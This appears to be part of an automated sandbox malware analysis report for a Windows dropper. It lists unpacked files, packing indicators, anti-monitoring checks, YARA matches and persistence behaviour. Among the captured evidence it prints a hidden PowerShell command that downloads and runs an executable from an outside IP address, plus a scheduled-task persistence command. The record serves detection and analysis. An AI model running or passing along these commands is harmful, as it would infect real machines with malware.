                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 13.2.skotes.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 14.2.skotes.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeUnpacked PE file: 15.2.9c1024a1f1.exe.fc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndccpyxw:EW;hexaatse:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ndccpyxw:EW;hexaatse:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeUnpacked PE file: 16.2.935372fb1f.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gdiknbhi:EW;bcaisgyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gdiknbhi:EW;bcaisgyr:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeUnpacked PE file: 50.2.c7f37422c5.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndmxoxsq:EW;subumggu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ndmxoxsq:EW;subumggu:EW;.taggant:EW;
                                Source: random[2].exe.14.dr, s1l70P8mWLYDmBOs6L.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                Source: f891ed3167.exe.14.dr, s1l70P8mWLYDmBOs6L.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                Source: random[2].exe0.14.dr, PjMboxrZKVMRiayL4T.cs.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
                                Source: f8e8a2d2f0.exe.14.dr, PjMboxrZKVMRiayL4T.cs.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: random[2].exe.14.drStatic PE information: 0xDF9E7476 [Fri Nov 19 11:54:30 2088 UTC]
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009642DE
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: real checksum: 0x218f49 should be: 0x215024
                                Source: f8e8a2d2f0.exe.14.drStatic PE information: real checksum: 0x0 should be: 0xbb8c2
                                Source: random[1].exe0.14.drStatic PE information: real checksum: 0x209862 should be: 0x203baa
                                Source: 935372fb1f.exe.14.drStatic PE information: real checksum: 0x219d2f should be: 0x20e8e8
                                Source: skotes.exe.11.drStatic PE information: real checksum: 0x218f49 should be: 0x215024
                                Source: f891ed3167.exe.14.drStatic PE information: real checksum: 0x0 should be: 0xd2e10
                                Source: random[2].exe0.14.drStatic PE information: real checksum: 0x0 should be: 0xbb8c2
                                Source: random[2].exe1.14.drStatic PE information: real checksum: 0x0 should be: 0x557df
                                Source: random[1].exe2.14.drStatic PE information: real checksum: 0xdfde2 should be: 0xd54e7
                                Source: random[1].exe1.14.drStatic PE information: real checksum: 0x219d2f should be: 0x20e8e8
                                Source: 7ecb69d7f1.exe.14.drStatic PE information: real checksum: 0xdfde2 should be: 0xd54e7
                                Source: d9caf9fc21.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x557df
                                Source: random[2].exe.14.drStatic PE information: real checksum: 0x0 should be: 0xd2e10
                                Source: random[2].exe2.14.drStatic PE information: real checksum: 0x214fee should be: 0x21625f
                                Source: c7f37422c5.exe.14.drStatic PE information: real checksum: 0x214fee should be: 0x21625f
                                Source: 9c1024a1f1.exe.14.drStatic PE information: real checksum: 0x209862 should be: 0x203baa
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name:
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: .idata
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name:
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: rtrxnzik
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: vyhzfbjm
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.drStatic PE information: section name: .taggant
                                Source: skotes.exe.11.drStatic PE information: section name:
                                Source: skotes.exe.11.drStatic PE information: section name: .idata
                                Source: skotes.exe.11.drStatic PE information: section name:
                                Source: skotes.exe.11.drStatic PE information: section name: rtrxnzik
                                Source: skotes.exe.11.drStatic PE information: section name: vyhzfbjm
                                Source: skotes.exe.11.drStatic PE information: section name: .taggant
                                Source: random[1].exe.14.drStatic PE information: section name: .symtab
                                Source: 33c3d7c7bd.exe.14.drStatic PE information: section name: .symtab
                                Source: random[1].exe0.14.drStatic PE information: section name:
                                Source: random[1].exe0.14.drStatic PE information: section name: .idata
                                Source: random[1].exe0.14.drStatic PE information: section name:
                                Source: random[1].exe0.14.drStatic PE information: section name: ndccpyxw
                                Source: random[1].exe0.14.drStatic PE information: section name: hexaatse
                                Source: random[1].exe0.14.drStatic PE information: section name: .taggant
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name:
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: .idata
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name:
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: ndccpyxw
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: hexaatse
                                Source: 9c1024a1f1.exe.14.drStatic PE information: section name: .taggant
                                Source: random[1].exe1.14.drStatic PE information: section name:
                                Source: random[1].exe1.14.drStatic PE information: section name: .idata
                                Source: random[1].exe1.14.drStatic PE information: section name:
                                Source: random[1].exe1.14.drStatic PE information: section name: gdiknbhi
                                Source: random[1].exe1.14.drStatic PE information: section name: bcaisgyr
                                Source: random[1].exe1.14.drStatic PE information: section name: .taggant
                                Source: 935372fb1f.exe.14.drStatic PE information: section name:
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: .idata
                                Source: 935372fb1f.exe.14.drStatic PE information: section name:
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: gdiknbhi
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: bcaisgyr
                                Source: 935372fb1f.exe.14.drStatic PE information: section name: .taggant
                                Source: random[2].exe2.14.drStatic PE information: section name:
                                Source: random[2].exe2.14.drStatic PE information: section name: .idata
                                Source: random[2].exe2.14.drStatic PE information: section name:
                                Source: random[2].exe2.14.drStatic PE information: section name: ndmxoxsq
                                Source: random[2].exe2.14.dr | Static PE information: section name: subumggu
                                Source: random[2].exe2.14.dr | Static PE information: section name: .taggant
                                Source: c7f37422c5.exe.14.dr | Static PE information: section name:
                                Source: c7f37422c5.exe.14.dr | Static PE information: section name: .idata
                                Source: c7f37422c5.exe.14.dr | Static PE information: section name:
                                Source: c7f37422c5.exe.14.dr | Static PE information: section name: ndmxoxsq
                                Source: c7f37422c5.exe.14.dr | Static PE information: section name: subumggu
                                Source: c7f37422c5.exe.14.dr | Static PE information: section name: .taggant
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00980A76 push ecx; ret 0_2_00980A89
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009CAB3F push dword ptr [ecx-75h]; iretd 0_2_009CAB44
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009CAC7D push dword ptr [ecx-75h]; iretd 0_2_009CAC82
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD106500BD pushad ; iretd 9_2_00007FFD106500C1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD1072260C push 8B485F93h; iretd 9_2_00007FFD10722611
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_006ED91C push ecx; ret 14_2_006ED92F
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_00B98EF0 push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_00B9900A push es; ret 15_3_00B99041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_00B8E044 push 9800B8CBh; retf 15_3_00B8E049
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_00B8DFD0 push eax; retf 15_3_00B8E041
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_059D669C push eax; ret 15_3_059D669D
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_059DCB52 push eax; retf 15_3_059DCB61
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_059DCB62 pushad ; retf 15_3_059DCB71
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.dr | Static PE information: section name: entropy: 7.105636274880829
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.dr | Static PE information: section name: rtrxnzik entropy: 7.953483509677053
                                Source: skotes.exe.11.dr | Static PE information: section name: entropy: 7.105636274880829
                                Source: skotes.exe.11.dr | Static PE information: section name: rtrxnzik entropy: 7.953483509677053
                                Source: random[1].exe0.14.dr | Static PE information: section name: entropy: 7.176715017904416
                                Source: random[1].exe0.14.dr | Static PE information: section name: ndccpyxw entropy: 7.953467525882589
                                Source: 9c1024a1f1.exe.14.dr | Static PE information: section name: entropy: 7.176715017904416
                                Source: 9c1024a1f1.exe.14.dr | Static PE information: section name: ndccpyxw entropy: 7.953467525882589
                                Source: random[1].exe1.14.dr | Static PE information: section name: entropy: 7.9332071022094555
                                Source: random[1].exe1.14.dr | Static PE information: section name: gdiknbhi entropy: 7.95124476904847
                                Source: 935372fb1f.exe.14.dr | Static PE information: section name: entropy: 7.9332071022094555
                                Source: 935372fb1f.exe.14.dr | Static PE information: section name: gdiknbhi entropy: 7.95124476904847
                                Source: random[2].exe2.14.dr | Static PE information: section name: entropy: 7.937516755296097
                                Source: random[2].exe2.14.dr | Static PE information: section name: ndmxoxsq entropy: 7.9512778633809855
                                Source: c7f37422c5.exe.14.dr | Static PE information: section name: entropy: 7.937516755296097
                                Source: c7f37422c5.exe.14.dr | Static PE information: section name: ndmxoxsq entropy: 7.9512778633809855
                                Source: random[2].exe.14.dr, s1l70P8mWLYDmBOs6L.cs | High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
                                Source: random[2].exe.14.dr, cVtkWMF9BXSUpNpZaGX.cs | High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
                                Source: f891ed3167.exe.14.dr, s1l70P8mWLYDmBOs6L.cs | High entropy of concatenated method names: 'VAYPi0gMpB', 'nW4lBacjpc', 'yJ9PnvReTK', 'GevPEs5ZlO', 'gkNPK4v4fw', 'o7SPNXHjF0', 'KmAZJZ5bsD', 'Fupap7L4k', 'r4yl3DrYU', 'rewL2KpDf'
                                Source: f891ed3167.exe.14.dr, cVtkWMF9BXSUpNpZaGX.cs | High entropy of concatenated method names: 'cMXGkimXqS', 'yhcGJJVgWb', 'RTMG9LTTMo', 'nmhGrPX3O8', 'wLgGAj6lSy', 'KeNG22TvML', 'xfBGmYjwkH', 'e3bFNlGvVM', 'd2AGYe9bE9', 'HbuGuZGGpK'
                                Source: random[2].exe0.14.dr, IAYNcYxlTFn1TcgV7Nc.cs | High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
                                Source: random[2].exe0.14.dr, PjMboxrZKVMRiayL4T.cs | High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
                                Source: f8e8a2d2f0.exe.14.dr, IAYNcYxlTFn1TcgV7Nc.cs | High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
                                Source: f8e8a2d2f0.exe.14.dr, PjMboxrZKVMRiayL4T.cs | High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'

                                Persistence and Installation Behavior

                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com
                                Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com
                                Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe

                                Boot Survival

                                Source: Yara match | File source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22790546318.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | Window searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | Window searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Window searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Window searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Window searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Window searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe | Window searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe | Window searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe | Window searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe | Window searched: window name: RegmonClass
                                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | File created: C:\Windows\Tasks\skotes.job
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0097F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0097F98E
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009F1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_009F1C41
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key value created or modified: unknown 1A717C40FF7F60C18953B46A69A8FC47CCE7DAD6116CD3715DEB2ABF0D80722D
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
